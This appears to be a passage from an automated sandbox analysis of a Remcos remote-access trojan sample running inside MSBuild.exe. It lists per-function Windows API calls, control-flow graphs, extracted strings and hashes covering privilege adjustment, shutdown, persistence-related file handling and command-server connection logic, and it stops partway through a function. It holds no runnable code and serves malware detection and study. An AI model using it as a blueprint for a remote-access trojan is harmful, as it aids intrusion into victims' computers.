                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                          • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                          • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                        • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                                                                                        • ExitProcess.KERNEL32 ref: 0040E672
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                        • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                                                        • API String ID: 2281282204-3981147832
                                                                                                                        • Opcode ID: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
                                                                                                                        • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                                                                                        • Opcode Fuzzy Hash: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
                                                                                                                        • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF
                                                                                                                        Function 004158B9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                          • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                          • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                          • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                          • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                                                        • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                                                        • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                        • String ID: PowrProf.dll$SetSuspendState
                                                                                                                        • API String ID: 1589313981-1420736420
                                                                                                                        • Opcode ID: 56eed2a0c493a37a9ebd172ea33a7f1355f0ef0f1c53220ea3ac6de77a0ff222
                                                                                                                        • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                                                                                        • Opcode Fuzzy Hash: 56eed2a0c493a37a9ebd172ea33a7f1355f0ef0f1c53220ea3ac6de77a0ff222
                                                                                                                        • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                                                                                        Function 00404915 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60timethreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLocalTime.KERNEL32(00000001,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404946
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404994
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                                                                                        Strings
                                                                                                                        • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Create$EventLocalThreadTime
                                                                                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                        • API String ID: 2532271599-1507639952
                                                                                                                        • Opcode ID: 91fcc87cdf63508fbb142367321fb0c568eb54b34a3fc30a6c2ed25526885608
                                                                                                                        • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                                                                                        • Opcode Fuzzy Hash: 91fcc87cdf63508fbb142367321fb0c568eb54b34a3fc30a6c2ed25526885608
                                                                                                                        • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                                                                                        Function 0043293A Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                                                                                        • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1815803762-0
                                                                                                                        • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                        • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                                                                                        • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                        • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                                                                                        Function 0041A7A2 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetComputerNameExW.KERNEL32(00000001,?,0000002B,00474358), ref: 0041A7BF
                                                                                                                        • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Name$ComputerUser
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4229901323-0
                                                                                                                        • Opcode ID: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                                                                        • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                                                        • Opcode Fuzzy Hash: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                                                                        • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                                                                        Function 0040E679 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2299586839-0
                                                                                                                        • Opcode ID: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                                                        • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                                                        • Opcode Fuzzy Hash: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                                                        • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                                                                                        Function 004260F7 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: recv
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1507349165-0
                                                                                                                        • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                        • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                                                                        • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                        • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                                                                                        Function 0040D767 Relevance: 95.3, APIs: 13, Strings: 41, Instructions: 799COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 5 40d767-40d7e9 call 41bce3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afc3 call 40e8bd call 401d8c call 43e820 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 48 40dc96-40dca7 call 401eea 23->48 79 40d9a5-40d9ac call 40bed7 69->79 80 40d96d-40d98c call 401e8f call 4124b7 69->80 70->69 102 40e134-40e154 call 401e8f call 412902 call 4112b5 70->102 90 40d9b5-40d9bc 79->90 91 40d9ae-40d9b0 79->91 80->79 98 40d98e-40d9a4 call 401e8f call 412902 80->98 92 40d9c0-40d9cc call 41a463 90->92 93 40d9be 90->93 96 40dc95 91->96 103 40d9d5-40d9d9 92->103 104 40d9ce-40d9d0 92->104 93->92 96->48 98->79 107 40da18-40da2b call 401d64 call 401e8f 103->107 108 40d9db call 40697b 103->108 104->103 128 40da32-40daba call 401d64 call 41ae08 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 107->128 129 40da2d call 4069ba 107->129 117 40d9e0-40d9e2 108->117 120 40d9e4-40d9e9 call 40699d call 4064d0 117->120 121 40d9ee-40da01 call 401d64 call 401e8f 117->121 120->121 121->107 138 40da03-40da09 121->138 163 40db22-40db26 128->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a611 128->164 129->128 138->107 140 40da0b-40da11 138->140 140->107 142 40da13 call 4064d0 140->142 142->107 165 40dcaa-40dd01 call 436050 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->165 166 40db2c-40db33 163->166 164->163 188 40dad7-40db1d call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 164->188 219 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5e7 165->219 168 40dbb1-40dbbb call 4082d7 166->168 169 40db35-40dbaf call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 166->169 178 40dbc0-40dbe4 call 4022f8 call 4338c8 168->178 169->178 199 40dbf3 178->199 200 40dbe6-40dbf1 call 436050 178->200 188->163 203 40dbf5-40dc40 call 401e07 call 43e349 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 199->203 200->203 257 40dc45-40dc6a call 4338d1 call 401d64 call 40b125 203->257 272 40dd79-40dd7b 219->272 273 40dd5e 219->273 257->219 274 40dc70-40dc91 call 401d64 call 41ae08 call 40e219 257->274 276 40dd81 272->276 277 40dd7d-40dd7f 272->277 275 40dd60-40dd77 call 41beb0 CreateThread 273->275 274->219 292 40dc93 274->292 280 40dd87-40de66 call 401f66 * 2 call 41a686 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->280 276->280 277->275 330 40dea1 280->330 331 40de68-40de9f call 43360d call 401d64 call 401e8f CreateThread 280->331 292->96 333 40dea3-40debb call 401d64 call 401e8f 330->333 331->333 342 40def9-40df0c call 401d64 call 401e8f 333->342 343 40debd-40def4 call 43360d call 401d64 call 401e8f CreateThread 333->343 354 40df6c-40df7f call 401d64 call 401e8f 342->354 355 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 342->355 343->342 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 40b95c 354->365 366 40dfba-40dfde call 41a7a2 call 401e18 call 401e13 354->366 355->354 365->366 386 40dfe0-40dfe1 SetProcessDEPPolicy 366->386 387 40dfe3-40dff6 CreateThread 366->387 386->387 390 40e004-40e00b 387->390 391 40dff8-40e002 CreateThread 387->391 394 40e019-40e020 390->394 395 40e00d-40e017 CreateThread 390->395 391->390 398 40e022-40e025 394->398 399 40e033-40e038 394->399 395->394 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a686 call 401eea 399->404 414 40e094-40e0d4 call 41ae08 call 401e07 call 412584 call 401e13 call 401e07 401->414 415 40e12a-40e12f call 40cbac call 413fd4 401->415 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 414->433 415->102 434 40e0f4-40e125 call 41ae08 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->415 435->434 436 40e0db-40e0e8 Sleep call 401e07 435->436 436->433
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                                                          • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                                                          • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                                                          • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                                                          • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                          • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                          • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000104), ref: 0040D790
                                                                                                                          • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                        • String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                                                                        • API String ID: 2830904901-1887556364
                                                                                                                        • Opcode ID: 87003e204c4ecd466d61ad1f5c7ddce927d9ea30a70c95020367db40776ccb3a
                                                                                                                        • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                                                                                        • Opcode Fuzzy Hash: 87003e204c4ecd466d61ad1f5c7ddce927d9ea30a70c95020367db40776ccb3a
                                                                                                                        • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E
                                                                                                                        Function 00413FD4 Relevance: 48.1, APIs: 5, Strings: 22, Instructions: 813sleepnetworkCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 447 413fd4-41401f call 401faa call 41aa73 call 401faa call 401d64 call 401e8f call 43a5e7 460 414021-414028 Sleep 447->460 461 41402e-41407c call 401f66 call 401d64 call 401fbd call 41afc3 call 404262 call 401d64 call 40b125 447->461 460->461 476 4140f0-41418a call 401f66 call 401d64 call 401fbd call 41afc3 call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 461->476 477 41407e-4140ed call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 461->477 530 41419a-4141a1 476->530 531 41418c-414198 476->531 477->476 532 4141a6-414242 call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 413f9a 530->532 531->532 559 414244-41428a WSAGetLastError call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 532->559 560 41428f-41429d call 4041f1 532->560 582 414b54-414b66 call 4047eb call 4020b4 559->582 565 4142ca-4142df call 404915 call 40428c 560->565 566 41429f-4142c5 call 401f66 * 2 call 41a686 560->566 581 4142e5-414432 call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 4 call 41a96d call 413683 call 4082dc call 440c51 call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 41265d 565->581 565->582 566->582 647 414434-414441 call 40541d 581->647 648 414446-41446d call 401e8f call 412513 581->648 595 414b68-414b88 call 401d64 call 401e8f call 43a5e7 Sleep 582->595 596 414b8e-414b96 call 401d8c 582->596 595->596 596->476 647->648 654 414474-414abb call 403b40 call 40cbf1 call 41adee call 41aec8 call 41ad46 call 401d64 GetTickCount call 41ad46 call 41aca0 call 41ad46 * 2 call 41ac52 call 41aec8 * 5 call 40e679 call 41aec8 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c call 404468 call 401eea * 50 call 401e13 call 401eea * 6 call 401e13 call 4045d5 648->654 655 41446f-414471 648->655 900 414ac0-414ac7 654->900 655->654 901 414ac9-414ad0 900->901 902 414adb-414ae2 900->902 901->902 903 414ad2-414ad4 901->903 904 414ae4-414ae9 call 40a767 902->904 905 414aee-414b20 call 405415 call 401f66 * 2 call 41a686 902->905 903->902 904->905 916 414b22-414b2e CreateThread 905->916 917 414b34-414b4f call 401eea * 2 call 401e13 905->917 916->917 917->582
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                                                                                                        • WSAGetLastError.WS2_32 ref: 00414249
                                                                                                                        • Sleep.KERNEL32(00000000,00000002), ref: 00414B88
                                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep$ErrorLastLocalTime
                                                                                                                        • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                                                                                                                        • API String ID: 524882891-329437720
                                                                                                                        • Opcode ID: 5b765eaed3a498000d149d4314c37cb7c3f7fd8bdc94e19b00e9a18a556f0a33
                                                                                                                        • Instruction ID: a0bb0b13232d9f5991351636829aab2dda2428bc81dc0b9639db3628de0ead2f
                                                                                                                        • Opcode Fuzzy Hash: 5b765eaed3a498000d149d4314c37cb7c3f7fd8bdc94e19b00e9a18a556f0a33
                                                                                                                        • Instruction Fuzzy Hash: 58524E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D
                                                                                                                        Function 00409E48 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                                                          • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                          • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                          • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                          • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                                                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                                                          • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                        • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                                                        • API String ID: 3795512280-3163867910
                                                                                                                        • Opcode ID: da4891e1813a42c55b3ab5888db0cc17f90dbe763a6cce2da1c90d345f1a7bd1
                                                                                                                        • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                                                                                        • Opcode Fuzzy Hash: da4891e1813a42c55b3ab5888db0cc17f90dbe763a6cce2da1c90d345f1a7bd1
                                                                                                                        • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A
                                                                                                                        Function 0040428C Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 147networkCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
